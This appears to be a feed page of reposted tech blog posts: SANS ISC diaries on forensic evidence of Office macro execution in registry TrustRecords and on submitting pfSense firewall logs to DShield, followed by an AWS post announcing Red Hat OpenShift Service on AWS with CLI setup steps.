[2021-02-08 07:06:36] [1693] [ftp_21_tcp 29914] [] info: Stored 1578496 bytes of data



This is one of many tasks Windows Sandbox can be used for, such as accessing suspicious sites or running untrusted software and scripts (starting Windows with networking or the vGPU disabled), without the fear of impacting your normal Windows installation. These various tasks can be accomplished by creating separate .wsb Sandbox scripts.


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Office macro execution evidence, (Fri, Mar 26th)

This post was originally published on this site

Microsoft Office Macros continue to be the security nightmare that they have been for the past 3 decades. System and security admins everywhere continue to try to protect their users from prevalent macro malware, but they find Microsoft's tooling often less than helpful.

Case in point, the Microsoft page that describes how to disable macros sports this useful warning:

If only life were so easy…. The only two people who will ever be "sure" what a macro is doing are its original developer, and the malware analyst who just reverse engineered it. And I'm actually even doubtful about the developer.  

Considering how shaky and often bypassed the available mechanisms to control macro usage are, we would expect to at least see some decent instrumentation that allows us to log, monitor and reproduce "what happened". But… no. There are hardly any useful logs, which over the years has led to a plethora of work-arounds, YARA rules, PowerShell scripts, and reverse engineering.

This week, I had the "joy" of doing a bit of the latter, while investigating an incident. One of the few places where macro execution leaves traces is in the "TrustRecords" entry in the registry:

HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords
HKCU:\SOFTWARE\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords
HKCU:\SOFTWARE\Microsoft\Office\16.0\PowerPoint\Security\Trusted Documents\TrustRecords

The version number (16.0) might vary depending on your Office installation. Whether, when and how the keys get populated also depends on the "Trust Center" setting as described in the Microsoft link above.

But in general, the registry entries will look something like this:


The rightmost value (00 or 7f) indicates which trust center warning the user clicked away. "00" means "Open for Editing" and "7F" means "Allow Macros to Run". The other hex values encode, amongst other data, the original creation time stamp of the file whose name is shown. This can be extremely helpful when you need to determine the exact time of original download, if the file came from a shady source. In combination with the file name, this can be the "pivot points" that you need in an incident to go hunting in proxy or email logs, to determine how that file got to the user in the first place. 

Volatility has support to extract this information, but if you are forensicating on a live system, you can also wing it with Powershell in a pinch:

$regkeys =  'HKCU:\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords',
            'HKCU:\SOFTWARE\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords',
            'HKCU:\SOFTWARE\Microsoft\Office\16.0\PowerPoint\Security\Trusted Documents\TrustRecords'
foreach ($key in $regkeys) {
        # skip hives/keys that do not exist on this system
        try {$item = Get-Item $key -ErrorAction Stop} catch { continue }
        foreach ($line in $item.Property) {
            $values = $item.GetValue($line)
            # last byte: 0x7F = "Allow Macros to Run", 0x00 = "Open for Editing"
            if ($values[-1] -gt 0) {$type="RUN"} else {$type="EDIT"}
            # first 8 bytes: 64-bit FILETIME creation timestamp
            $timestamp = [datetime]::FromFileTimeUtc([System.BitConverter]::ToUInt64($values,0))
            Write-Output "$line $timestamp $type"
        }
}

Yep, not exactly the most beautiful code. It ain't my fault that Microsoft insists on using 64 bits for a time stamp, nor that converting such a value back into human-readable time is so convoluted in PowerShell :).

In my case, for the registry screenshot shown above, the PowerShell spits out the following:

%USERPROFILE%/Downloads/invoice%2058633.xls 03/24/2021 23:52:21 RUN
%USERPROFILE%/Downloads/Invoice%2038421.xls 03/22/2021 23:45:42 EDIT
%USERPROFILE%/Downloads/Invoice%2094377.xls 03/22/2021 21:02:04 EDIT

which tells me that the file I want is "invoice 58633.xls", because for it, Macros were allowed to run. It also gives me a timestamp for when the user made the download – March 24, 23:52 UTC. 

If you have savvy ways of keeping track of or analyzing macro execution in your environment, please let us know, or share in the comments below.


Submitting pfSense Firewall Logs to DShield, (Thu, Mar 25th)


In my previous diaries, I wrote about pfSense firewalls [1], [2]. I hope those diaries have given some insight to current pfSense users, and also inspire individuals who have yet to deploy any form of information security mechanism in their home/personal networks to do so. At the SANS Internet Storm Center, we welcome interested participants to submit firewall logs to DShield [3]. In this diary entry, I would like to share how to do so if you are using a pfSense firewall. I also highlight some minor issues I discovered when I was trying to set up the DShield pfSense client, and how to resolve them so you can send your logs to DShield successfully. Please remember to do a config backup on your pfSense firewall before changing anything, and test the changes in a test network before deploying them to the production environment. At the time of writing, all configuration and testing were done on pfSense 2.5.0-RELEASE Community Edition.

1) Configure pfSense E-Mail Settings
E-Mail settings inside the pfSense Notifications menu have to be enabled if you want to submit your pfSense firewall logs to DShield. To navigate to the appropriate settings page, please go to “System > Advanced > Notifications”. Figure 1 shows the corresponding screenshot, and also some sample settings if you are using Google Mail. When the corresponding details have been added, scroll down and select “Save” first. After that, click on “Test SMTP Settings” and see if you received the test e-mail. Please use the e-mail address that you have registered with the SANS Internet Storm Center.

Figure 1: SMTP Settings on pfSense (Google Mail is being used here)

Note: You have to save the details before testing the SMTP settings. There is currently a bug in pfSense that loads the wrong password if you test SMTP settings and subsequently save them [4].
If you are using Google Mail, you may get an error message about SMTP failure indicating that the test e-mail could not be sent. Following that, you may receive an e-mail from Google stating that a sign-in attempt was blocked. If you follow the error code, it leads to a Google Account Help page stating that “Less secure app access” may have to be enabled because 2-step verification is not enabled. If you do get this, please enable 2-step verification, configure an App password to use for the E-Mail settings in pfSense, and then complete Google’s Display Unlock Captcha [5]. A detailed explanation of how to configure an App password can be found here [6]. Enabling less secure app access is highly discouraged; it is always a good security practice to use two-factor authentication (2FA) when logging in to your accounts.

2) Create a new directory to store DShield files
It is recommended that the DShield files be put in a convenient directory (/root/bin/). In a default installation of pfSense, there is no /bin directory inside /root, so it has to be created manually. To do so, navigate to the pfSense WebGUI Command Prompt page at “Diagnostics > Command Prompt”. Type in the command mkdir /root/bin/ under the “Execute Shell Command” section. Figure 2 below shows successful execution of the command.

Figure 2: Creation of /root/bin/ directory

3) Download and edit DShield pfSense Client

It is now time to prepare the 2 files that have to be copied to your pfSense firewall – dshield.php and dshield.sample (dshield.sample will have to be renamed to dshield.ini after the relevant details are filled in). They can be downloaded from Johannes Ullrich’s GitHub repository over here [7]. There are multiple ways of loading these 2 files into the firewall, such as via SSH, SCP or even a direct curl command. However, since dshield.sample has to be modified and renamed before it can be used by dshield.php, I will be modifying the files locally on a computer before uploading them via the pfSense WebGUI Command Prompt page (if you prefer to modify them directly on the firewall via SSH or direct interaction with the firewall, by all means do so; I personally prefer to finalize file edits before pushing them to the firewall). With reference to Figure 3, edit lines 4, 5 and 6 of dshield.sample with your SANS Internet Storm Center details (these can be found in your Internet Storm Center account; please refer to Figure 4 to see the information required for Line 4 and Line 6). You will also need to edit line 13 and input the IP address that you are sending the firewall logs from (i.e. your public IP address). This prevents your IP address from being blocked/reported as an offender if some outgoing traffic is blocked within your network (e.g. NTP, or some other traffic blocked due to security policies).

Figure 3: Details to be amended in dshield.sample (to be renamed to dshield.ini)

Figure 4: User ID # and API Key Details for dshield.sample (to be renamed to dshield.ini)

You will need to ensure that the interface name (Line 9) matches the alias name of your WAN interface (with reference to Figure 5, this information can be retrieved at https://&lt;yourpfsenseipaddress&gt;/status_interfaces.php). By default, if it was not amended when pfSense was first installed, you should not need to amend Line 9 of dshield.sample.

Figure 5: WAN Name for Line 9 in dshield.sample (to be renamed to dshield.ini)

Finally, remember to rename dshield.sample to dshield.ini (do not forget this, or else dshield.php will not work).

4) Upload dshield.php and dshield.ini to your pfSense firewall

Finally, we can now upload dshield.php and dshield.ini into your pfSense firewall. We will use the pfSense WebGUI Command Prompt page to upload the 2 files. Under the “Upload File” section, browse to where dshield.php and dshield.ini was saved on your computer and select “Upload” (please refer to Figures 6 and 7).

Figure 6: dshield.php Uploaded to pfSense Firewall

Figure 7: dshield.ini Uploaded to pfSense Firewall

They will first end up in the /tmp directory. Type in the following commands (without quotes) “mv /tmp/dshield.ini /root/bin/“ and “mv /tmp/dshield.php /root/bin/” under the “Execute Shell Command” section of the pfSense WebGUI Command Prompt page to move them into the /root/bin/ directory (Figure 8 and 9 shows the commands being executed successfully).

Figure 8: Execution of command (without quotes) “mv /tmp/dshield.ini /root/bin/

Figure 9: Execution of command (without quotes) “mv /tmp/dshield.php /root/bin/

5) Make dshield.php executable, and add a Cron Job

We also have to make dshield.php executable. With reference to Figure 10, the command (without quotes) “chmod +x /root/bin/dshield.php” is executed.

Figure 10: Making dshield.php Executable

Finally, to ensure that firewall logs are regularly sent to DShield, a cron job for dshield.php has to be scheduled. There are a few ways to schedule such a job. For example, you could SSH into your pfSense firewall, run the command (without quotes) “crontab -e”, and add the line (without quotes) “11,41 * * * * /root/bin/dshield.php” (this means that at the 11th and 41st minute of every hour, dshield.php is executed). However, if we are strictly using the pfSense WebGUI Command Prompt, “crontab -e” will not work, as the WebGUI Command Prompt does not support interactive sessions. As such, we will install the “Cron” package, which is located under “System > Package Manager > Available Packages”. If you had previously installed the Cron package, this step can be skipped.
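If you do have shell access, the file placement, permission and scheduling steps can be sketched as a few commands (paths as used in this diary; the cron line is the same one described above):

```shell
# Place the DShield client files and make the script executable
mkdir -p /root/bin 2>/dev/null || true
mv /tmp/dshield.php /tmp/dshield.ini /root/bin/ 2>/dev/null || true
chmod +x /root/bin/dshield.php 2>/dev/null || true

# Cron schedule: run at minute 11 and 41 of every hour
CRON_LINE='11,41 * * * * /root/bin/dshield.php'
echo "$CRON_LINE"   # add via 'crontab -e' or the Cron package GUI
```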

Figure 11: Installing pfSense Cron Package

After Cron is installed, it can be found under “Services > Cron” (please refer to Figure 12 for an illustration).

Figure 12: Location of pfSense Cron Menu Item

Select “Add”, and fill in the corresponding details (Please refer to Figure 13 for a screenshot of the configuration):

Day of the Month*
Month of the Year*
Day of the Week*

Figure 13: Configuration of dshield.php Cron Job

6) Configuration complete, and test dshield.php

After all the configuration has been completed, run the command (without quotes) “/root/bin/dshield.php” in the pfSense WebGUI Command Prompt. With reference to Figure 14, it shows a successful execution of dshield.php.

Figure 14: Successful execution of dshield.php

After a few minutes (it may take a while at times), you will receive an acknowledgement from admin<at>dshield[.]org and a short summary of what was submitted to DShield. Alternatively, if you did not opt in to receive an acknowledgement e-mail after submitting your firewall logs, you can also navigate to the “My Reports” tab in your Internet Storm Center account to see the logs that you have submitted (in the last 30 days). The command (input the command without quotes) “cat /tmp/lastdshieldlog” can also be executed in the pfSense WebGUI Command Prompt to check the contents of firewall logs last submitted to the SANS Internet Storm Center.

With that, your pfSense firewall has been configured to regularly submit firewall logs to DShield. Registered users can also optionally enable Fightback in their account; after analysis, log reports will be forwarded to the Internet Service Provider (ISP) from which the attack originated [8]. All DShield data is consolidated over here [9] and will benefit users globally in protecting their networks from intrusion attempts.


Yee Ching Tok, ISC Handler
Personal Site


Red Hat OpenShift Service on AWS Now GA


Our customers come to AWS with many different experiences and skill sets, and we are continually thinking about how we can make them feel at home on AWS. In this spirit, we are proud to launch Red Hat OpenShift Service on AWS (ROSA), which allows customers familiar with Red Hat OpenShift tooling and APIs to extend easily from their datacenter into AWS.

ROSA provides a fully managed OpenShift service with joint support from AWS and Red Hat. It has an AWS integrated experience for cluster creation, a consumption-based billing model, and a single invoice for AWS deployments.

We have built this service in partnership with Red Hat to ensure you have a fast and straightforward way to move some or all of your existing deployments over to AWS, confident in the knowledge that you can turn to both Red Hat and AWS for support.

If you’re already familiar with Red Hat OpenShift, you can accelerate your application development process by leveraging standard APIs and existing Red Hat OpenShift tools for your AWS deployments. You’ll also be able to take advantage of the wide range of AWS compute, database, analytics, machine learning, networking, mobile, and other services to improve customer agility, rate of innovation, and scalability.

To demonstrate how ROSA works, let me show you how I create a new cluster.

Building a Cluster With ROSA
First, I need to enable ROSA in my account. To do this, I head over to the console and click the Enable OpenShift button.

Screenshot of Red Hat OpenShift Console

Once enabled, I then check out the Getting Started section, which provides instructions on downloading and installing the ROSA CLI.

Once the CLI is installed, I run the verify command to ensure I have the necessary permissions:

rosa verify permissions

I already have my AWS credentials set up on my machine, so now I need to log into my Red Hat account. To do that, I issue the login command and follow the instructions on setting up a token.

rosa login

To confirm that I am logged into the correct account and all set up, I run the whoami command:

rosa whoami

This lists all my AWS and Red Hat account details and confirms what AWS Region I am currently in.

AWS Account ID:               4242424242
AWS Default Region:           us-east-2
AWS ARN:                      arn:aws:iam::4242424242:user/thebeebs
OCM API:            
OCM Account ID:               42hhgttgFTW
OCM Account Name:             Martin Beeby
OCM Account Username:
OCM Account Email:  
OCM Organization ID:          42hhgttgFTW
OCM Organization Name:        AWS News Blog
OCM Organization External ID: 424242

To prepare my account for cluster deployment, I need a CloudFormation stack to be created in my account. This takes 1-2 minutes to complete, and I kick the process off by issuing the init command.

rosa init

Now that I am set up, I can create a cluster. It takes around 40 minutes for the cluster creation to complete.

rosa create cluster --cluster-name=newsblogcluster

To check the status of my cluster, I use the describe command. During cluster
creation, the State field will transition from pending to installing and finally reach ready.

rosa describe cluster newsblogcluster
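Since cluster creation takes a while, it can be handy to script the wait. A minimal sketch of parsing the State field out of the describe output (the get_state function is stubbed with canned output here; in practice, replace its body with the rosa describe cluster command above and poll in a loop):

```shell
# Hypothetical state check; get_state stands in for
# 'rosa describe cluster newsblogcluster'
get_state() { printf 'Name:  newsblogcluster\nState: ready\n'; }
STATE=$(get_state | awk -F': *' '/^State:/ {print $2}')
echo "cluster state: $STATE"
```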

I can now list all of my clusters using the list command.

rosa list clusters

My newly created cluster is now also visible within the Red Hat OpenShift Cluster manager console. I can now configure an Identity provider in the console, create admins, and generally administer the cluster.

To learn more about how to configure an identity provider and deploy applications, check out the documentation.

Available Now
Red Hat OpenShift Service on AWS is now generally available in the following regions: Asia Pacific (Tokyo), Asia Pacific (Seoul), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), Canada (Central), Europe (Frankfurt), Europe (Stockholm), Europe (Ireland), Europe (London), Europe (Paris), South America (São Paulo), US East (N. Virginia), US East (Ohio), US West (N. California), and US West (Oregon).

While this is a service jointly managed and supported by Red Hat and AWS, you will only receive a bill from AWS. Each AWS service supporting your cluster components and application requirements will be a separate billing line item just like it is currently, but now with the addition of your OpenShift subscription.

Our customers tell us that a consumption-based model is one of the main reasons they moved to the cloud in the first place. Consumption-based pricing allows them to experiment and fail fast, and customers have told us they want to align their Red Hat OpenShift licensing consumption with how they plan to operate in AWS. As a result, we provide both an hourly, pay-as-you-go model and annual commitments; check out the pricing page for more information.

To get started, create a cluster from the Managed Red Hat OpenShift service on the AWS Console. To learn more, visit the product page. Happy containerizing.

— Martin